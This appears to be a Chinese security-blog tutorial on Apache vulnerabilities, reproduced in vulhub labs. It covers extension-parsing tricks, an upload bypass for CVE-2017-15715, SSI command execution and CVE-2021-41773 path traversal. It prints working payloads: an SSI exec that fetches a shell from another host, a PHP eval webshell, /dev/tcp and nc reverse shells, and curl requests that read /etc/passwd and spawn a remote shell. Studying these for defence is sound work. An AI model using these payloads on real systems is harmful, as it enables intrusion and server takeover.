中间件常见漏洞之Apache
2023-3-4 22:33:38 Author: 渗透安全团队(查看原文) 阅读量:17 收藏

现在只对常读和星标的公众号才展示大图推送,建议大家能把渗透安全团队设为星标”,否则可能就看不到了啦

免责声明

由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 apache简介

Apache 是目前世界排名第一的 web 服务器,可以运行在几乎所有广泛使用的计算机平台上。由于其跨平台性和安全性被广泛使用,同时它能通过简单的API进行扩充,并将 Perl/Python 等解释器编译到服务器中。要知道 Apache 中间件可了解下最常见的 Apache 建站组合:LAMP,它们分别对应 Linux、Apache、Mysql、PHP。其中各组件的作用如下:

Linux:操作系统底层
PHP:服务端语言,主要通过php_module与Apache服务器相关联
Apache:中间件,用于沟通Linux和PHP
Mysql:数据库,通过php_extensions处理PHP的请求,配合查询、增删数据库中的数据
Apache 本身是不支持 PHP 解析的,但是可以通过 LoadModule 来加载 php_module 模块,从而将其作为 Apache 的子模块运行,当请求 PHP 文件时,Apache 就会调用 php_module 来解析 PHP 代码。通过以下方式可以添加执行 PHP 文件类型
AddType application/x-httpd-php .php<FilesMatch \.php$>      SetHandler application/x-httpd-php</FilesMatch>
Apache生命周期
Apache从启动到运行经历以下几个过程

如上图所示,Apache 首先会解析配置文件,加载模块并初始化系统资源,完成启动阶段。接下来进入运行阶段,开始循环处理请求,完成对用户请求的处理。

1.URI Translation:将请求的URL映射到本地文件系统,mod_alias模块就是在这个阶段工作。
2.Header Pasing:解析header头部,mod_setenvif模块在这个阶段工作。
3.Access Control:按照配置文件设定的策略对用户进行认证,并设定用户名区域,模块在这个阶段可以实现认证方法。
4.Authorization:根据配置文件检查是否允许认证过的用户执行请求的操作,模块在这个阶段可以实现用户权限管理方法。
5.MIME Type Checking:根据请求资源的MIME类型的相关规则,将文件交由相应的处理模块。
6.Fix Up:模块在内容生成器之前,运行必要的处理流程。
7.Response:生成响应报文。
8.Logging:在客户端后记录事物。
9.ClenaUp:清除请求后遗留的环境。
Apache工作模式
MPM(Multi Processing Modulings,多路处理模块)是 Apache 的核心组件之一,Apache 通过 MPM 来使用操作系统资源,对线程、进程池进行管理。Apache 为了获得更好的运行性能,针对不同的平台(Linux/unix、Windows)提供了不同的 MPM,用户可以根据实际情况进行选择,其中最常使用的两种是 perfork 和 worker。
Perfork
Perfork是非线程、预生成进程型MPM,会预先启动一些子进程,每个子进程一个时间只能处理一个请求,并且会根据并发请求数量来动态生成更多的子进程。配置参数如下:
StartServices: 服务器默认启动的子进程MinSpareServers: 最小空闲进程数量MaxSpareServers: 最大空闲进程数量MaxClient: 最高并发量ServerLimit: 最大限制并发量MaxRequestPerChild: 每个子进程默认最多处理多少个请求,当达到设定值时,这个进程就会被kill掉,重新生成一个新的进程(避免出现内存泄露等安全问题或运行太久出现假死等情况)
Worker
Worker是线程化、多进程的MPM,每个进程可以生成多个线程,每个线程处理一个请求,不需要启用过多的子进程,每个进程能够拥有的线程数量是固定的。服务器会根据负载情况增加或减少进程数量,一个单独的控制进程(父进程)负责子进程的建立。每个子进程能够建立ThreadsPerChild数量的服务线程和监听线程,该监听线程监听接入请求并将其传递给服务线程处理和应答。配置参数如下:
StartServers: 服务器启动时建立的子进程数(默认为3)MaxClients: 允许同时服务的最大请求数量(最大线程数),任何超过MaxClients限制的请求都将进入等待队列(默认为400)MinSpareThreads: 最小空闲线程数(默认值为75)MaxSpareThreads: 最大空闲线程数(默认值为250)ThreadsPerChild: 每个子进程建立的常驻的执行线程数(默认值为25)MaxRequestPerChild: 每个子进程在其生存期内允许处理的最大请求数
差别
1、Perfork的速度要高于Worker,因此它需要的cpu和内存也稍高于Worker。 
2、Perfork的无线程设计在某些情况下更具有优势,它可以使用那些没有处理好线程安全的第三方模块,对于那些线程调试困难的平台而言也更容易调试一些。 
3、在高流量的HTTP服务器上,Worker相对于Perfork会好许多,因为相比内存占用要低得多。

0x02 apache安装

官网下载地址:https://www.apachehaus.com/cgi-bin/download.plx

Windows下安装Apache
在官网直接下载即可,解压后其目录如下:

在conf目录下存在配置文件httpd.conf,可用于配置 Apache 中间件

进入bin目录启动 Apache 应用,如果返回OK则说明它能够正常启动

httpd -t

开始在服务中安装 Apache

xxxxxxxxxx httpd -k install -n Apache2.4

启动服务或停止服务命令如下:

httpd -k starthttpd -k stop

服务启动后访问界面如下:

也可以直接在bin目录下运行ApacheMonitor.exe程序,达到的效果都是一样的

Linux下安装Apache
而在 Linux 下安装也非常简单,利用 yum 等包管理工具可轻松安装成功
yum install httpd## 停止或启动服务service httpd startservice httpd stop

其默认服务目录在/etc/httpd当中

0x03 apache漏洞

未知扩展名解析漏洞
漏洞详情
Apache 解析漏洞依赖一个特性,它对文件的解析后缀不仅仅是认识最后一个后缀名,而是从右至左依次识别,当遇到一个文件存在多个以点分隔的后缀时,如mac.php.x.a,它会从.a开始识别,直到遇到自己能够解析的后缀名.php,通过 phpstudy 搭建复现环境并访问站点

在Apache的文件名扩展conf/mime.types中进行设置,其中规定了哪些扩展名Apache认识,而哪些扩展名Apache不认识。

在站点目录下分别放置1.jpg、1.jpg.aa以及1.php.aa

通过访问发现1.jpg.aa与1.jpg内容相同,说明该漏洞存在

但是访问1.php.aa只显示文本内容,并没有对 PHP 解析

难道是 PHP 未配置成功?访问 PHPINFO 文件phpinfo.php成功解析

在 Apache 使用 module 模式与 PHP 结合的所有版本中存在未知扩展名解析漏洞,而使用 fastcgi 与 PHP 结合的所有版本中则不存在该漏洞,出现上述情况难道是 Apache 使用 fastcgi 模式导致漏洞复现未成功?
Module模式:

FastCgi模式:

经验证这也不是使用模式的问题,当模式改为fastcgi后访问文件还会出现500错误

而出现 PHP 未解析的主要原因在 PHP 配置文件php.conf当中

<FilesMatch ".+\.ph(p[345]?|t|tml)$">    SetHandler application/x-httpd-php</FilesMatch>
通过以上正则匹配可知 PHP 匹配文件名如果遇到最后一个后缀名不是ph(p[345]?|t|tml)$,不会把它当做 PHP 来执行,即使 Apache 认为它是 PHP 文件,只要将正则表达式中的$替换为\.后就能解决这个问题。
由于 phpstudy 中未找到php.conf,于是在 Kali 中查找配置文件
find / -name php*.conf

在php7.4.conf中修改如下:

<FilesMatch ".+\.ph(p[345]?|t|tml)\.">    SetHandler application/x-httpd-php</FilesMatch>

重启 Apache 服务,访问站点成功

service apache2 start

重新在 Kali 中访问1.php.aa,解析成功

配置错误导致的解析漏洞
漏洞详情
在 Apache 的站点配置conf-enabled下添加*.conf文件,设置完后重启 Apache 即可将文件名中所有存在.php的文件都解析为PHP
vim mac.confAddHandler application/x-httpd-php .php

比如访问1.php.txt.aa,成功解析

当然也可以将*.conf设置如下,两者功能相同

<FilesMatch "1.jpg">    SetHandler application/x-httpd-php</FilesMatch>

访问1.jpg同样可以成功解析

扩展思路
只要在 Apache 配置文件*.conf下插入配置信息即可完成任意文件名解析,由此可以扩展到.htaccess文件,与*.conf类似,但它需要处在站点根目录下,攻击者可通过上传.htaccess文件完成 PHP 解析,感兴趣的朋友可在文件上传靶场Uplood-Labs中进行练习。
罕见后缀名解析漏洞
漏洞详情
查看 PHP 的配置文件,发现后缀名除了php可以被解析为 PHP 以外,还能通过phar、phtml等进行解析,当遇到文件上传点采用黑名单为.php时,我们可使用.phar、.phtml后缀来绕过限制。

比如1.phtml,解析 PHP 成功

目录遍历
漏洞详情
如果将httpd.conf和vhosts.conf中的-都设置为+,会导致目录遍历漏洞的产生

访问1目录,存在目录遍历漏洞

如果想要修复该漏洞,将+修改为-后重启服务器即可。在谷歌中利用谷歌黑客语法可轻易找到存在该漏洞的网站

intitle:index of

换行解析漏洞(CVE-2017-15715
漏洞详情
上传一个后缀末尾包含换行符的文件可绕过FilesMatch,Apache 通过 mod_php 执行脚本,在解析时会将xxx.php\x0A当做 PHP 来解析,利用该方式可绕过服务器的一些安全策略,从而导致漏洞产生。该漏洞的根本原因在于php.conf中的$不仅匹配字符串结尾位置,也可以匹配\n或者\r等换行符。
影响版本:Apache 2.4.0-2.4.29
下载 docker 部署 vulhub 环境进行复现,在 ubuntu 下安装 docker
sudo apt install curlcurl -s https://get.docker.com/ | shsudo apt install python
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.pysudo python get-pip.py
pip install docker-composesudo apt install docker-compose

通过以下命令验证 docker-compose 是否已经安装

docker-compose -v

开启 CVE-2017-15715 环境

cd vulhub/httpd/CVE-2017-15715/sudo docker-compose buildsudo docker-compose up -ddocker ps

访问目标站点http://192.168.0.107:8080

首先直接上传正常的.php后缀文件,发现不能上传

通过 burpsuite 抓取上传请求包,发送至repeater模块

把符号点.替换为换行符,即0x7e替换为0x0a

结果显示上传成功,成功绕过限制

访问`http://192.168.0.107:8080/evil.php%0A`,文件已经成功解析为 PHP

那么为什么添加换行符后就可以成功执行PHP解析呢?先来看看上传界面index.php

<?php  if(isset($_FILES['file'])) {      $name = basename($_POST['name']);      $ext = pathinfo($name,PATHINFO_EXTENSION);      if(in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {          exit('bad file');      }      move_uploaded_file($_FILES['file']['tmp_name'], './' . $name);  } else {?>
在代码中可以看到后台虽然过滤了 PHP 后缀的文件,但在正则中只表示匹配字符串的结尾处。而如果设置了RegExp对象的Multiline属性,也可以成功匹配\n和\r等换行字符,这里需要区分0x0a和0x0d,前者为换行到下一行行首起始位置,后者只是移动光标到该行起始位置。因此只有0x0a能起作用,而0x0d不起作用。该漏洞算是 Apache 的特性,只是开发或运维人员对其理解深度不足而导致。
修复建议
1、升级到最新版本 
2、将上传的文件名重命名并禁止上传目录执行脚本权限
SSI远程代码执行漏洞
漏洞详情
SSI(Server-side inculdes)是放置在 HTML 中的指令,它可以将动态生成的内容添加到现有的HTML页面上,而不必通过 CGI 程序或其他动态程序来支持整个界面,简单来说就是它可以在 HTML 中加入特定的指令,也可以引入其他的页面,开启 SSI 需要单独配置 Apache。它能够完成查看时间、文件修改时间、CGI程序执行结果、执行系统命令、连接数据库等操作,功能十分强大。该漏洞可在 vulhub 中进行复现,启动漏洞环境
cd vulhub/httpd/ssi-rcedocker-compose ps docker-compose up -d

访问http://192.168.0.107:8080/upload.php,这是一个上传界面

利用SSI执行系统命令的功能,构造一个包含系统指令的文件mac.shtml

<pre><!--#exec cmd="whoami"--></pre>

上传成功后返回文件路径

访问路径http://192.168.0.107:8080/mac.shtml,成功执行系统命令

尝试执行命令写入小马

<!--#exec cmd="wget http://192.168.0.105/shell.txt | rename shell.txt mac.php" --> <!--#exec cmd="echo '<?php @eval($_POST[mac]);?>' > mac.php" --> 

成功连接蚁剑,连接地址为http://192.168.0.107:8080/mac.php

当然也可以执行反弹shell

<!--#exec cmd="/bin/bash -i > /dev/tcp/192.168.0.108/8888 0<&1 2>&1" --><!--#exec cmd="nc 192.168.0.108 8888 -e /bin/bash"-->

Apahce HTTPd 2.4.49(CVE-2021-41773)

Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:
1、版本等于2.4.49
2、Require all granted(默认情况下是允许被访问的)。
攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。
影响版本
Apache HTTP Server 2.4.49
本实验使用vulhub环境,节约搭建时间
mkdir Dockerfile //在空目录里面创建Dockerfile目录cd Dockerfile //进入Dockerfile目录vi Dockerfile //创建文件Dockerfil并编写

DockerFile文件内容:

FROM httpd:2.4.49
RUN set -ex \ && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \ && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \ && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \ && cat /usr/local/apache2/conf/httpd.conf \ | tr '\n' '\r' \ | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n AllowOverride none\n Require all granted\n</Directory>|isg' \ | tr '\r' '\n' \ | tee /tmp/httpd.conf \    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
接下来在 Dockerfile 文件的存放目录下,执行构建动作。
以下示例,通过目录下的 Dockerfile 构建一个 httpd:2.4.49rce(镜像名称:镜像标签)。
注:最后的 . 代表本次执行的上下文路径。
docker build -t  httpd:2.4.49rce .

运行docker

docker run  -d -p 85:80 httpd:2.4.49rce

之后就可以通过浏览器访问量(如果浏览器访问不了,重新启动实验机后再启动docker就可以解决该问题)

POC测试

curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

或者

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 192.168.241.142:85Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Connection: close

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行,(此靶场是已启用cgid)
远程代码执行POC:
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/192.168.190.146/8888 0>&1' "http://XXXXX:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

或者

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1Host: 192.168.241.142:85Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Connection: closeContent-Length: 8
echo;pwd

漏洞修复

升级到Apache HTTP Server最新版本。


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247499405&idx=1&sn=cb77cd8aeeb93a9dc04ef25ae2bd64fd&chksm=c1760322f6018a34ba00c2c786bff7da3363a55f902daf9bb83d764a21bae3930f51099561f2#rd
如有侵权请联系:admin#unsafe.sh